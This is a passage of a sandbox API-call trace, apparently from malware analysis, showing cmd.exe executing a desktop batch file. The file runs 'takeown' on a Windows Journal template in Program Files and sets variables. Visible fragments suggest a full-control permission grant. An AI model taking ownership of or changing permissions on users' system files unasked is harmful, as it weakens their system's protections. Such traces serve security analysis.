lpFindFileData=0x37e5b0) returned 0x4a76e8 [0182.846] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0182.846] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0182.847] GetLastError () returned 0x2 [0182.847] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0x4a76e8 [0182.847] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0182.847] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.848] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.848] GetConsoleTitleW (in: lpConsoleTitle=0x37eaa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.848] InitializeProcThreadAttributeList (in: lpAttributeList=0x37e930, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37e9f8 | out: lpAttributeList=0x37e930, lpSize=0x37e9f8) returned 1 [0182.848] UpdateProcThreadAttribute (in: lpAttributeList=0x37e930, dwFlags=0x0, Attribute=0x60001, lpValue=0x37e9f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37e930, lpPreviousValue=0x0) returned 1 [0182.848] GetStartupInfoW (in: lpStartupInfo=0x37e8ec | out: lpStartupInfo=0x37e8ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0182.848] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.849] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37e98c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37e9d8 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessInformation=0x37e9d8*(hProcess=0x78, hThread=0x74, dwProcessId=0x38c, dwThreadId=0x4e8)) returned 1 [0183.986] CloseHandle (hObject=0x74) returned 1 [0183.986] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.986] GetProcessHeap () returned 0x490000 [0183.986] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a98 | out: hHeap=0x490000) returned 1 [0183.986] GetEnvironmentStringsW () returned 0x4a7f30* [0183.986] GetProcessHeap () returned 0x490000 [0183.986] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb5c) returned 0x4a8a98 [0183.987] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0183.987] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0190.008] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x37e8cc | out: lpExitCode=0x37e8cc*=0x0) returned 1 [0190.009] CloseHandle (hObject=0x78) returned 1 [0190.009] _vsnwprintf (in: _Buffer=0x37ea14, _BufferCount=0x13, _Format="%08X", _ArgList=0x37e8d8 | out: _Buffer="00000000") returned 8 [0190.009] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.009] GetProcessHeap () returned 0x490000 [0190.009] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a98 | out: hHeap=0x490000) returned 1 [0190.009] GetEnvironmentStringsW () returned 0x4a7f30* [0190.009] GetProcessHeap () returned 0x490000 [0190.009] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb5c) returned 0x4a8a98 [0190.009] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0190.009] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.009] GetProcessHeap () returned 0x490000 [0190.010] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a98 | out: hHeap=0x490000) returned 1 [0190.010] GetEnvironmentStringsW () returned 0x4a7f30* [0190.010] GetProcessHeap () returned 0x490000 [0190.010] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb5c) returned 0x4a8a98 [0190.010] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0190.010] GetProcessHeap () returned 0x490000 [0190.010] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d38 | out: hHeap=0x490000) returned 1 [0190.010] DeleteProcThreadAttributeList (in: lpAttributeList=0x37e930 | out: lpAttributeList=0x37e930) [0190.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.010] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.010] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0190.011] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.011] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0190.011] SetConsoleInputExeNameW () returned 0x1 [0190.011] GetConsoleOutputCP () returned 0x1b5 [0190.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0190.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0190.013] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0190.013] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.013] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6940 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6810 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a66e8 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4280 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6650 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6438 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a63b8 | out: hHeap=0x490000) returned 1 [0190.013] GetProcessHeap () returned 0x490000 [0190.013] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6288 | out: hHeap=0x490000) returned 1 [0190.014] GetProcessHeap () returned 0x490000 [0190.014] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6160 | out: hHeap=0x490000) returned 1 [0190.014] GetProcessHeap () returned 0x490000 [0190.014] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a60f0 | out: hHeap=0x490000) returned 1 [0190.014] GetProcessHeap () returned 0x490000 [0190.014] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911a0 | out: hHeap=0x490000) returned 1 [0190.014] GetProcessHeap () returned 0x490000 [0190.014] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4912a0 | out: hHeap=0x490000) returned 1 [0190.014] GetProcessHeap () returned 0x490000 [0190.014] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491140 | out: hHeap=0x490000) returned 1 [0190.014] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.014] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0190.014] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0xb3, lpOverlapped=0x0) returned 1 [0190.015] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0190.015] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0190.015] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.015] GetFileType (hFile=0x78) returned 0x1 [0190.015] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.016] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0190.016] GetProcessHeap () returned 0x490000 [0190.016] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0190.016] GetProcessHeap () returned 0x490000 [0190.016] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x74) returned 0x4a10e0 [0190.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", nBufferLength=0x208, lpBuffer=0x37e8c0, lpFilePart=0x37e8b8 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFilePart=0x37e8b8*="Seyes.jtp") returned 0x34 [0190.017] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x4a76e8 [0190.017] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0190.017] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0190.017] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x4a76e8 [0190.017] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0190.017] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0190.018] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0x4a76e8 [0190.018] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0190.018] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0190.018] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56edc4c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56edc4c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47f4134f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa95a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Seyes.jtp", cAlternateFileName="")) returned 0x4a76e8 [0190.018] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0190.018] GetProcessHeap () returned 0x490000 [0190.018] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1c) returned 0x4a77e8 [0190.019] GetProcessHeap () returned 0x490000 [0190.019] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0190.021] _tell (_FileHandle=3) returned 63 [0190.021] _close (_FileHandle=3) returned 0 [0190.021] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37ef04 | out: _Buffer="\r\n") returned 2 [0190.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.021] GetFileType (hFile=0x7) returned 0x2 [0190.022] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.022] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec4 | out: lpMode=0x37eec4) returned 1 [0190.022] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.022] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eef0*=0x2) returned 1 [0190.024] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0190.024] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37ef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0190.025] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37ef00 | out: _Buffer=">") returned 1 [0190.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.025] GetFileType (hFile=0x7) returned 0x2 [0190.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec8 | out: lpMode=0x37eec8) returned 1 [0190.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eef4*=0x26) returned 1 [0190.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.026] GetFileType (hFile=0x7) returned 0x2 [0190.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f14c | out: lpMode=0x37f14c) returned 1 [0190.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x490d40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x37f178, lpReserved=0x0 | out: lpBuffer=0x490d40*, lpNumberOfCharsWritten=0x37f178*=0x3) returned 1 [0190.028] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f184 | out: _Buffer=" FN=\"Seyes.jtp\" ") returned 16 [0190.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.028] GetFileType (hFile=0x7) returned 0x2 [0190.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0190.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x10) returned 1 [0190.029] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f1a4 | out: _Buffer="\r\n") returned 2 [0190.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.029] GetFileType (hFile=0x7) returned 0x2 [0190.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f164 | out: lpMode=0x37f164) returned 1 [0190.030] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f190*=0x2) returned 1 [0190.032] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0190.032] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0190.032] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0190.033] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0190.033] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0190.033] _wcsicmp (_String1="set", _String2="CD") returned 16 [0190.033] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0190.033] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0190.033] _wcsicmp (_String1="set", _String2="REN") returned 1 [0190.033] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0190.033] _wcsicmp (_String1="set", _String2="SET") returned 0 [0190.033] GetConsoleTitleW (in: lpConsoleTitle=0x37ed14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.034] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0190.034] SetEnvironmentVariableW (lpName="FN", lpValue="\"Seyes.jtp\"") returned 1 [0190.034] GetProcessHeap () returned 0x490000 [0190.034] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a98 | out: hHeap=0x490000) returned 1 [0190.034] GetEnvironmentStringsW () returned 0x4a7f30* [0190.034] GetProcessHeap () returned 0x490000 [0190.034] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb7a) returned 0x4aa188 [0190.034] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0190.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.034] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0190.035] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.035] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0190.036] SetConsoleInputExeNameW () returned 0x1 [0190.036] GetConsoleOutputCP () returned 0x1b5 [0190.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0190.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0190.038] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0190.038] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.038] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911d0 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911a0 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a76e8 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d38 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491140 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a77e8 | out: hHeap=0x490000) returned 1 [0190.038] GetProcessHeap () returned 0x490000 [0190.038] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a10e0 | out: hHeap=0x490000) returned 1 [0190.038] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.038] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0190.038] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0xa3, lpOverlapped=0x0) returned 1 [0190.039] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0190.039] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0190.039] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.039] GetFileType (hFile=0x78) returned 0x1 [0190.039] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.039] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0190.039] GetProcessHeap () returned 0x490000 [0190.039] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0190.039] GetProcessHeap () returned 0x490000 [0190.040] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x70) returned 0x491140 [0190.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x37e8c0, lpFilePart=0x37e8b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x37e8b8*="Ch81ANBE.bat") returned 0x32 [0190.040] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4911b8 [0190.040] FindClose (in: hFindFile=0x4911b8 | out: hFindFile=0x4911b8) returned 1 [0190.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4911b8 [0190.040] FindClose (in: hFindFile=0x4911b8 | out: hFindFile=0x4911b8) returned 1 [0190.040] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0190.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4911b8 [0190.040] FindClose (in: hFindFile=0x4911b8 | out: hFindFile=0x4911b8) returned 1 [0190.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x37e5d4 | out: lpFindFileData=0x37e5d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x4911b8 [0190.040] FindClose (in: hFindFile=0x4911b8 | out: hFindFile=0x4911b8) returned 1 [0190.041] 